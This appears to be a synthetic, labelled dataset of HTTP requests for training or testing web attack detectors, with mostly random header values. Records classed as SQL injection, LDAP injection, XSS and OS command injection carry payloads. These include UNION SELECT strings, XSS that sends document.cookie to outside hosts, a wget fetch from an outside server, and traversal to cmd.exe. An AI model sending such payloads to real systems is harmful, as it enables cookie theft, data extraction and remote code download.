Cache-Control: no-cache
Client-ip: 70.153.112.5
Cookie2: $Version="84"
Date: Sat, 24 Feb 07 02:13:56 CET
If-Match: *
If-None-Match: *
Max-Forwards: 62
Pragma: no-cache
Authorization: NTLM cmExcm91bmxjaWVpOWVUbnRBdHRhYWNkbUN6dDZmZUh1c09xOQ==
Referer: http://www.ianteyTi.it/fo5ee/ncedo/mExbal/iulgusrn.pl
User-Agent: Mozilla/0.8 (Windows; U; Win98 4.1; Yg-et; rv:7.9.9) Gecko/83069758
UA-Color: color32
Transfer-Encoding: Tehtej; eGah6tt8=ewraail

null

End - Id: 45298
Start - Id: 42447
class: SqlInjection
GET /passwdCPI_Rlogkk1etcNR/zlvioihioiraSogiNs/wQagGb/w6objectrM8hlYacceptq.gif?13eHnsotv5He=957071&ujh6cmfr=ouNXrT4%40&tioftbisber=18702&W2ogafrqf=tJPk84qyU&bia1s=ay&9qHautoexecWDhL=%27+union+select+sum%282nus9so%29++from+++++tadnOr--&edvnticsdpcfd=uha.gIUi&tbetealnTbta=nfwaon2cn&0l2o=11&4mellpta=1544&n3samrI7QOe.@=rwoeohldegmsn&rtenh4h4en=5%409dbL%40&rNtto9na=+aisl&kobs5=676&Lt1sr=49904874 HTTP/1.0
Host: www.b1oryhrn.fr
Connection: tOs1
Accept: image/*;q=0.6, video/mpeg
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: Mm='a1hahh0'
Client-ip: 253.155.111.28
Cookie: e8f6ek=1tThVGqSGP;blztwot=306142;sm=2oz3i9e5i;nsiwia=gh;5hoyrar=3470
Cookie2: $Version="228"
Date: Wed, 21 Jan 04 10:22:50 GMT
ETag: W/"Ng0H_XYkXY0iPSN"
Expect: 8iyua=geano5a;hrrnm=tEmsnt
From: erEcOsi@8seaoan.st
If-Modified-Since: Tue, 28 Sep 04 22:30:47 UTC
If-Unmodified-Since: Mon, 17 Jul 06 03:57:42 UTC
If-Match: "Yd4.RPTuLWsCuF9"
If-None-Match: "sUmghx9.Fo4xOPb"
If-Range: Wed, 09 Jun 04 03:05:30 GMT
Max-Forwards: 976
MIME-Version: 0.7
Pragma: eblmoe='msqTsn'
Proxy-Authorization: Digest realm
Authorization: Basic MGxkNWRhOmtlaGlp
Range: 378414-80248,967-,-2698
Referer: http://www.dotiyuSe.gov/hc9t/nTao0osa.asmx
TE: deflate;q=0.0,deflate
Trailer: If-Unmodified-Since
User-Agent: npu7 (tFM2kl2Q; w2egbbaN; cUw_7h; e3qwJ_p.)
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 028x6235
Via: sgt/9.9 219.217.149.18, FTP/9.4 www.6tEK.htm, 3.5 www.6ufpt.png
Transfer-Encoding: identity
Upgrade: irelm/1.0, pnd/5.9, apf/2.0, tndhu/6.2
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 222.68.170.108
X-Serial-Number: 630486475749117
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42447
Start - Id: 41580
class: SqlInjection
GET /lO5vun1in2Rb3FxFeXW/tm9/uyiiN.j-Z03J.vbZNv/snayeeiIo/bA/ei8toen/v.netcatservicesFAAGWvAb/oeEto63ieE/afnnoltdroaIsc9heeN/v092XI/m4lhnfoeoana3a5narnt.tiff?ttw=%27+++%29+++UNION+ALL+SELECT++0+FROM++++awBtd+WHERE+%28++%27%27++++%3D+%27&xasinrt1AOsndas=Etstnoes HTTP/1.0
Host: www.uglmesH.be
Connection: 2blt6wt
Accept: video/mpeg;q=0.2, audio/basic;q=0.6, application/*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 237.68.176.239
Cookie: sessiriri=unionscriptA2nivbscriptbetween1eefebarsfo;exiahceTHt5=%d~;hzie1uE9s4=62;atMsitsxee=dg3tnullicala;qrnsernua8th= ss;7h=@
Cookie2: $Version="8"
Date: Sat, 03 Dec 05 08:06:52 GMT
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Sat, 04 Aug 07 02:36:52 GMT
If-Unmodified-Since: Sat, 15 Apr 06 05:20:50 UTC
If-Match: "f-qYG_DDORq5mdaMr57"
If-None-Match: *
If-Range: Wed, 30 Nov 05 03:35:24 GMT
Max-Forwards: 5
MIME-Version: 3.1
Pragma: emy=Wsbebha
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: NTLM aWVpZHVpcHdzYmFydHdvMGlpaXN2azZsc25lVFJ1ZzZvYmI1ZnVh
Range: 57313-1061,-0,406-
Referer: /mbri/arqeep.cgi
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: Mozilla/2.6 (X11; U; Open BSD i586 7.0; qa-nw; rv:0.1.0) Gecko/06815285
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: FTP/7.1 7.145.198.232:4, 0.6 74.229.41.79
Transfer-Encoding: identity
Upgrade: eia/5.7
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41580
Start - Id: 38068
class: LdapInjection
GET /awC6_8TK4Su/bCIipeRUNlFV-cun1XH/unT7mFsBGvx5IJ/cnM-pdfc7UqD/fbJpD3qb_llB/ethAdo/lnh3n/F-kn/mdeo.tiff?atct=usre+logm&som=%29++%28++++%7C+++%28+cn%3D*o+++%27brien*++++%29%28mail%3D*o+%27brien*++++%29+&olhefnxo=58090846&nosd=wyiw.6lz&.FSiZ=9&d6ipn=+ccNi%3F16E5+ehHia8&th=14&ger8zsnqbc=308&JRAi0dQqinputbetween4execO=8794967&i5rf47r6lbacb=3&UV9m_NPjBD=wrrrefgsaraeehaTee&Itrat=1882582 HTTP/1.1
Host: www.werv1earei.net
Connection: Nbih
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.0, identity
Accept-Language: iuloe-2lX;q=0.4, d3Aat4a-n;q=0.3, sei-NhaMmte;q=0.7, rtct-dworn
Cache-Control: no-cache
Client-ip: 163.227.108.150
Cookie: otd=85266864;omdh=80;62iecs=ept1by6_y-v;mtbwi=mtum;wfiEov94ig8peka=o4e%~  yvn tbin
Cookie2: $Version="57"
Date: Sun, 27 Jan 08 24:23:53 GMT
ETag: W/"aqQyLq-Rgqc2QXcXU"
Expect: 100-continue
From: klienot@sqnSctf.com
If-Modified-Since: Mon, 04 Jun 07 24:52:15 UTC
If-Unmodified-Since: Sat, 18 Jun 05 13:24:40 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 22 Mar 05 02:41:27 UTC
Max-Forwards: 6
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: 0eiAi6 etia=vaieJnc9
Authorization: Digest username="tezr"
Range: 77-,76-
Referer: http://avhpecI.uk/uQg0ath/lrUdt8mr.exe
TE: trailers
Trailer: Accept
User-Agent: raEmTJPLT6 http://www.t6at.com
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5823x093
Via: FTP/4.4 www.teeLOto.js, 9.4 www.wdr1Nae.shtml
Transfer-Encoding: deflate
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 530 132.99.115.0 "etnafLfea7n8Inlen7u9" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 814494240740
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38068
Start - Id: 38114
class: LdapInjection
GET /aloAohoimsg.mspx?GvbscripthtpassaXkUxGRZ=%29++%28+++%7C%28qo%3D6om*%29&hRcrfa5vtiVa=iea&ceyz=hLY5dHXutj HTTP/1.1
Host: www.lhsto.biz:80
Connection: close
Accept: */*
Accept-Charset: cp-950;q=0.1
Accept-Encoding: identity, identity;q=0.4, deflate, deflate;q=0.8
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 33.244.156.204
Cookie: vs=250147950;varNjEsl4=428094898;vscaeirkgsoe=1;7c0lNk=83066;cztp=rMh
Cookie2: $Version="0"
Date: Fri, 09 Jun 06 08:14:20 GMT
ETag: W/"Irr4LufP3gSyFhulv"
Expect: 5iat=2ntoc
From: ithsetus@ennnrj.net
If-Modified-Since: Tue, 13 May 08 24:31:28 CET
If-Unmodified-Since: Tue, 12 Sep 06 15:39:28 UTC
If-Match: "0VvPD1egPVWx_GJdM"
If-None-Match: *
If-Range: *
Max-Forwards: 361
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="r4lciIea"
Authorization: Digest realm
Range: 448259-
Referer: /hclaoeh/tr3i.wav
TE: deflate;q=0.4,gzip;q=0.3
Trailer: Trailer
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 9.4; fe-ew; rv:0.2.4) Gecko/98618948
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3700x2595
Via: FTP/6.8 153.42.227.91
Transfer-Encoding: gzip
Upgrade: ifowud/4.0, tto/4.9, xoi/9.2, yMow/1.8, ttyat/1.1
Warning: 773 www.pns3h.shtml:30 "Bia6nnelerntsir" "Mon, 07 Aug 06 12:34:20 UTC"
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38114
Start - Id: 47642
class: XSS
GET /i4b/f7/hqCZqLGJW/amGx@qYyg89CzsBY/fr@it7VXhtacces/21USodrm3n/RshutdownKjMt_DYBor/oelG7Er/mjehte5fl/net1slriaatnda/BMcMfdRCSTtS/ot@X7EDYAO0-i6M.php3?fuau=l5MJuFdxu&1rmAb4II=%3Cinput+++type+++%3D+%22image+%22+dynsrc%3D+++%22javascript%3A++++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.esat.com%2Fcgi-bin%2Ftitrin.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+++%3E&ndon6rHjhn=005&yod6=5492309&ranbwtyneeg=97496&gtsGetins=wz&me26kde=er&1jdaavt=aka%3E&reoU0hu=isMv2Uw&htaccesGyoQaa=222967&euq3puyu=OipSiren%2Bn&CWAVqv=wibvm%3D6oqx7%3Cise&rt=5iity HTTP/1.0
Host: 20.217.70.126
Connection: keep-alive
Accept: audio/x-wav, audio/x-wav, audio/x-wav;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=2
Client-ip: 61.243.9.51
Cookie: dqDusvoxtd9=dh9S.vha;ushutdownArBvsamstyle=rxdJnhayr
Cookie2: $Version="2"
Date: Sat, 20 Sep 08 15:27:14 GMT
ETag: W/"KeyKdGthDghEQTc"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Fri, 25 Sep 09 06:40:03 UTC
If-Unmodified-Since: Sun, 27 Dec 09 20:48:45 UTC
If-Match: *
If-None-Match: "g0Nxp49zdnVaV17qXr1"
If-Range: "lFZ0gggcJ8dQ6@gQ"
Max-Forwards: 3897
MIME-Version: 9.3
Pragma: w2gaaB4=eJsnti
Proxy-Authorization: Digest opaque="enht"
Authorization: dioam mgc6h8e=aeieIe
Range: 51-,059585-
Referer: /san8af.asmx
TE: trailers,deflate;q=0.3,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 5.1; At-hP; rv:5.9.3) Gecko/20237819
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 635x1311
Via: Tfmc/7.7 29.162.10.239, FTP/7.9 115.106.45.66, 6.5 www.vdprpnda.shtml:1739
Transfer-Encoding: wtree; stoak=wnhf
Upgrade: ndr6mr/8.8, almeeU/9.4, sshid/6.7, Stxlx/3.2
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47642
Start - Id: 46901
class: XSS
PUT /egDdCVbvVLfXRA/iAQB/uFX/s8O1samRvIQAqxbin/gV4M2u/s8wyh3TjUf3_t_2nLu/o7yeoCLWmRE/si8ssnowfdo.mspx? HTTP/1.0
Content-Length: 348
Content-Language: 0nelj,qeimohq
Content-Encoding: gzip
Content-Location: http://gFhnfEiI.biz/U6e6.jsp
Content-MD5: cmF0cm5hdHIxcGNoY3lheQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Feb 09 19:12:07 UTC
Last-Modified: Mon, 20 Jul 09 08:07:45 UTC
Host: www.vtilw.ch:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: w8negogl-14elr;q=0.7, rjnae-oqe;q=0.9, nub-ohtrtgn;q=0.1, E-somey;q=0.6
Cache-Control: no-cache
Client-ip: 216.37.168.1
Cookie: aelibep=93459;an=nedaed7edftxm/l;QOhttpsIDNY=rNtRx.iDOi
Cookie2: $Version="07"
Date: Wed, 25 Jan 06 16:16:21 CET
ETag: W/"Ja-Xf31larpSBKW5Vf9s"
Expect: nn9rnaex=r6EnRms;Reh7=hco2naP
From: nbfea3@yM2KA0.biz
If-Modified-Since: Thu, 27 May 04 13:50:00 UTC
If-Unmodified-Since: Thu, 16 Jun 05 05:46:25 UTC
If-Match: "Rs0MEDjgCXp9YWEU1v"
If-None-Match: *
If-Range: Sat, 16 Oct 04 04:44:41 CET
Max-Forwards: 119
MIME-Version: 9.1
Pragma: Rolclshy=Be0EC
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: Digest opaque="ntdla"
Range: -790
Referer: http://www.itnex.com/tcnTze/sex5z25u/n2na/eago7/hsmiee.pdf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.9 (X11; U; Open BSD i386 4.1; sT-ma; rv:7.5.5) Gecko/89566614
UA-CPU: MIPS
UA-Disp: 457,6373,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8473x700
Via: rinlex/7.4 115.255.202.36
Transfer-Encoding: identity
Upgrade: c7hl/0.0, ojnjz/4.8, sotds/6.5
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

j0Tg8hF=8&aaonhnrrsheqate=<a     href    ="about:<s&#99;ript >[window.open('http://44.71.174.205/etnete.cfm'+document.cookie);]</script>  "  >&eeo=oigdN4S0rdLP&fcT5i=ae&ts6rieUr=5919&m0_lxQ=A9bytbhsPB&oumUr=0260&ae=hg4a3igIgMtnrHeei&lwmeut6tidt=398939965&udwY=98178&uLtn=nXIeic1tat&rmYslarsn=ztak

End - Id: 46901
Start - Id: 43096
class: OsCommanding
GET /Jno9tstvddoort0n/tnl@T072S.js?dMtefsbes=115478&wjyp=ri%40O&XP-_Olib_xTUF=97547282&dt7eeE5=178&0nkiwsf=4941044736&linkzfK=45&dRmneTHreasules=urReeh+i&oted0zeDgmEieen=geetdce5&nEatshponoxeoo=aiao0dld&JDlVa02U@copyl=37107657&dt4ifteolasm=+c5E%24&Mldorag=o%3AD%24qere&64zrieajouc=%22++++%3B+++%2Fusr%2Fbin%2Fwget++www.inlenenilasi.com%2Falsene++++%3B&oooifeetneupT=7sstdinxteh HTTP/1.1
Host: www.i3te.com
Connection: keep-alive
Accept: text/xml, video/*, video/mpeg;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.2, identity
Accept-Language: kdo-ecgo7;q=0.4
Cache-Control: only-if-cached
Client-ip: 160.22.241.142
Cookie: giblArhete=18;ssetsi=822621;qfacniesrimjsg=stoes1'n\ore4yp;diebcit=oaRhiuwqisa;iuattydqe6rT=[ n1Ig
Cookie2: $Version="82"
Date: Sat, 21 Jan 06 10:17:50 GMT
ETag: W/"as5zU3TltwGEc-Ix0hc"
If-Modified-Since: Mon, 09 Jan 06 20:32:24 CET
If-Unmodified-Since: Tue, 30 Jun 09 14:40:19 UTC
If-Match: *
If-None-Match: "bThz1EV8KtvYztG-D4"
If-Range: *
Max-Forwards: 274
MIME-Version: 1.3
Pragma: utogitrL=s
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: /fmaHova/Czeaswux/sMnolone/itaeis/mEsvshv.html
TE: deflate
Trailer: If-Modified-Since
User-Agent: eaostn/4.0.7.8.7
UA-Disp: 418,932,32
UA-OS: Mac OS X
Via: HTTP/2.1 www.5sonfb.png, FTP/8.3 188.35.128.161
Transfer-Encoding: deflate
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 212 www.htenLWg.shtml:97715 "ednatrortnk4" "Wed, 22 Apr 09 12:47:41 UTC"
X-Serial-Number: 306986025864028
----: ------------------------------------------------

null

End - Id: 43096
Start - Id: 44064
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.0
Host: www.3smtrodal.net
Connection: close
Accept: text/*;q=0.2
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *
Cache-Control: r='ien8yyle'
Client-ip: 185.93.146.213
Cookie: suuhctekd=840;G9MN8V7sQ2U=hseo;aEnycwigmeb=235125;xuz=46618;dliTNfsd4g03oi=kiew
Cookie2: $Version="43"
Date: Thu, 12 Mar 09 05:56:14 GMT
ETag: W/"8jJSMp1FL9CwR-.L4"
Expect: 100-continue
From: Llna9@hrnonxai.de
If-Modified-Since: Wed, 11 Oct 06 11:18:01 UTC
If-Unmodified-Since: Sun, 11 Jan 04 07:13:57 UTC
If-Match: "UPwvHzNH49-3_djtCxyb"
If-None-Match: "PpmnxhuvcL8N-J4"
If-Range: Sat, 02 Dec 06 18:31:12 UTC
Max-Forwards: 5863
MIME-Version: 2.6
Pragma: bA=eHy
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: Digest nonce
Range: 42-,-56317,-7
Referer: /yfae/gfEld5fb/aldnfdzs.pdf
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: retdkkEphi/6.4.2
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: 8.6 www.cbtGUa.shtml
Transfer-Encoding: deflate
Upgrade: Rjwza/4.8, tein/1.3, crss4/4.1
Warning: 175 26.216.110.35 "tt5rn4Ks" "Fri, 26 May 06 17:19:02 GMT"
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 412280187
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44064
Start - Id: 47993
class: XSS
GET /7.i6q-FkSK.I9M4YGK.gif?Q0OmQ=eopta&DUYKDX0.V1=96609&G66Pn=d%40&pteqeSp1l=liZ8GdGauM&sweiaodopn=nretaenlstztugykdo&oooNtetikatnl=t06l&Azb4eas=bt0zM5siLhrvHh&sGtumetdrtaie=skauge%5D7t&iktkepor1hEdea=rctebfiemsim&atwr=%5B%5CxC0%5D%5B%5CxBC%5Dscript+%3E%5Balert+++%28%27jzd%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+%3E&lfeeu3bieQee=wmshrc HTTP/1.1
Host: 239.29.102.87
Connection: enltwrr
Accept: application/*;q=0.6, video/quicktime, text/html
Accept-Charset: iso-8859-8-i;q=0.3, x-mac-hebrew;q=0.0, koi8-r, iso-10646-ucs-2;q=0.3
Accept-Encoding: gzip, deflate;q=0.1, identity, gzip, compress;q=0.4
Accept-Language: *;q=0.6
Cache-Control: i='to'
Client-ip: 200.176.81.45
Cookie: cweeoney=711
Cookie2: $Version="01"
Date: Fri, 24 Oct 08 13:36:09 CET
ETag: "-9gzcYVJS5LQoj3kt1"
Expect: tuecaeh
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Sat, 23 Jun 07 18:46:29 CET
If-Unmodified-Since: Wed, 07 Mar 07 04:14:47 CET
If-Match: *
If-None-Match: "Ls_CRKSN.YPAAr9X8vt"
If-Range: Sun, 02 Jul 06 12:24:52 UTC
Max-Forwards: 9
MIME-Version: 3.4
Pragma: sa='lii2sic'
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Digest realm
Range: 209-45720
Referer: http://dntgt.fr/28wtf/h80nwb/iitbbthe.asmx
TE: gzip;q=0.7,trailers,trailers
Trailer: User-Agent
User-Agent: HH3h/8.1.1
UA-CPU: 68000
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 480x167
Via: 0.1 www.etsedn.tiff
Transfer-Encoding: gzip
Upgrade: ujou/5.1, doRY4j/6.5, hEhh/2.5, uoids3/2.1, iawl/7.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 44433169110
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47993
Start - Id: 38758
class: LdapInjection
GET /aTO2Z9BN-3iG6S74/t2.jpeg?Giht=e%40LO2GXW&mboasn2wn=6%7Ce&2frendqEDuueN=gee&lt0Biolaeedt=%29++%28++%7C+%28cn%3D*o++++%27brien*++++%29%28mail++++%3D*o++%27brien*++++%29++&tra=7476&ee4=iothe-+ceipa%5BS&fphB=e%3A&mOTmbsdaP=3532112 HTTP/1.0
Host: www.opdrrarpg.fr
Connection: aee4lms
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: identity, identity
Accept-Language: itycoiz-smloy;q=0.0, 4oo9atr-T;q=0.4
Cache-Control: no-transform
Client-ip: 185.134.129.220
Cookie: 4gleyt=704144;dakdLrteierab=tO5
Cookie2: $Version="4"
Date: Sat, 18 Oct 08 01:44:06 CET
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: twbawrei
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 02 May 06 15:44:31 GMT
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 94
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: NTLM YThwaWhUaGFmeUVubmxzR3Rlcm9pbXNiZXRySGRhZWl5NWZlbXVzc29NaQ==
Range: -6168,6-
Referer: /hsaisoe/ra3ketr.jsp
TE: trailers,chunked,chunked;q=0.0
Trailer: Accept
User-Agent: Mozilla/5.6 (compatible; MSIE 9.4; Windows NT; awp0ws4aon; Nkoftnee)
UA-CPU: Sparc
UA-Disp: 1190,0442,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8698x991
Via: detpfe/3.5 207.75.253.8, 4.9 165.85.232.243:524, dyr/2.9 17.223.153.21
Transfer-Encoding: i6ee
Upgrade: t68we/8.2, stg/0.3, jnds/5.8, yeex/3.7, gdi/4.0
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 99237184639
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38758
Start - Id: 48262
class: XSS
PUT /dpr/to73SpVOQ61_R/r2KIajNwFi3kkL/rYPx/hi/wY/SG.php? HTTP/1.1
Content-Length: 196
Content-Language: hle5
Content-Encoding: identity
Content-Location: http://www.Eisa.be/aaTsHo/yne9.mspx
Content-MD5: dHJrbmwzMTUxZVJJaWN0bA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Feb 07 06:47:56 CET
Last-Modified: Fri, 09 Apr 10 17:48:12 GMT
Host: 66.207.157.217
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-8;q=0.9, euc-cn
Accept-Encoding: compress
Accept-Language: cGah4-a4gdt0nm
Cache-Control: no-store
Client-ip: 166.142.44.213
Cookie: oo4usO9dyuOfItd=J;NIGomochawu0d5=bn0eca&7qf8u;gip6ife=e     onload=javascript:  alert  (helOO5Ta.tottUnS);QpqkJDu6qLoH=2aehbinnoedy70c;tEnaiki=wJRe6GCNqCm
Cookie2: $Version="810"
Date: Wed, 07 Mar 07 24:24:25 CET
ETag: "3pbfdW1HsbcRx-6xv"
Expect: ynynnm=nitai
From: aeebosbw@2l6nl.biz
If-Modified-Since: Sun, 20 Nov 05 17:38:50 CET
If-Unmodified-Since: Mon, 25 May 09 12:30:52 CET
If-Match: "XNxpMDQ47Ch@clOYKLMZ"
If-None-Match: "VyUT2F65xuyEH32ZOvTx"
If-Range: Sun, 10 Apr 05 18:20:26 GMT
Max-Forwards: 22
Pragma: lGt='druei'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest algorithm=MD5-sess
Range: 431947-
Referer: http://www.UeeyD.net/boeeiaqR.mdb
TE: gzip
Trailer: If-Match
User-Agent: Mozilla/0.0 (Windows; U; WinNT 5.7; td-ob; rv:9.8.1) Gecko/99535661
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 9755x524
Via: 9.1 0.46.134.210, 7.2 www.crt3.html:761, pip/1.0 252.11.15.104:941
Transfer-Encoding: compress
Upgrade: tPo/6.0, egp/7.6
Warning: 398 244.34.75.168:33 "moboleremetearlet" "Mon, 09 Jan 06 23:06:44 GMT"
X-Serial-Number: 96907185083
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~

wlrab=OeesYaofwistxr&lidom3al4cnheea=80122&oo4en8N=828&GRl3sqlsNqbetweenIM=108&1rdke1=77502024&zfrdnkz= fa &EsIF=\3|a&yaiCv2l=;%uoss&wnUohebz6ut3uAl=aTe;?&scSnzrtgscsWmtc=em6bartse] 

End - Id: 48262
Start - Id: 44183
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 119.7.174.18
Connection: oalEue
Accept: image/*;q=0.7, application/*, video/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.9
Accept-Language: ioH-qanItnn;q=0.0, nch75-heOpun;q=0.6, a0aq-ihdh8r, o-ttmrj9;q=0.2
Cache-Control: xi='ahtxep6m'
Client-ip: 163.193.116.46
Cookie: er6=uas;Me=eF:d;arOIUred=Awindow.openo+?el
Cookie2: $Version="67"
Date: Fri, 27 Feb 09 16:17:51 CET
ETag: W/"M9dWmzaYsbHXIY4Lq7Am"
Expect: 100-continue
From: ulnbn@Ssrnr.st
If-Modified-Since: Sun, 20 Jul 08 19:36:54 UTC
If-Unmodified-Since: Mon, 27 Aug 07 01:54:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 77
MIME-Version: 4.3
Pragma: t=yhm3t
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: cDaurr ereutyh=ddc7ens
Range: 5-,-97,-5
Referer: http://www.0odajE0.ch/k4gehbj/sny5nL.png
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/1.4 (compatible; MSIE 8.5; Windows NT; iyes; unx2os; watene)
UA-CPU: StrongARM
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: 9.4 35.174.121.35, tadhoe/8.3 82.252.108.104:8, 0.6 www.dbethx.tiff
Transfer-Encoding: identity
Upgrade: llemvt/2.2, yAhrud/8.0, Cskdn/9.3
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 338223
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44183
Start - Id: 37572
class: LdapInjection
PUT /iCCX7Ld0WYoYCQY3dXU.css? HTTP/1.1
Content-Length: 223
Content-Language: 4Nlh,vol
Content-Encoding: identity
Content-Location: http://www.eoo6.biz/in5eNau/swiie/ddsnsccE.swf
Content-MD5: dGVvZXRxZGVybXV0YzZycw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Mar 04 06:54:28 GMT
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: 110.26.110.160:80
Connection: close
Accept: audio/*, application/postscript
Accept-Charset: x-mac-ce;q=0.0, gb2312;q=0.9
Accept-Encoding: *
Accept-Language: wrrcbn8-hsetsahy;q=0.5
Cache-Control: agri8E='rsaerbzL'
Client-ip: 234.104.82.80
Cookie: eeeouRzLjoRsisx=oa$qtp$;8sanestes=EotaacepDt;tatopdyei=e]ohtpassh p0ltpe+eie&xi
Cookie2: $Version="03"
Date: Mon, 06 Feb 06 06:39:24 CET
ETag: "tHfhEG5KoTsauJa7W-J"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sun, 13 Mar 05 05:31:21 GMT
If-Unmodified-Since: Mon, 06 Mar 06 23:22:28 GMT
If-Match: "bcqrn2mHIR7afsMhPIw"
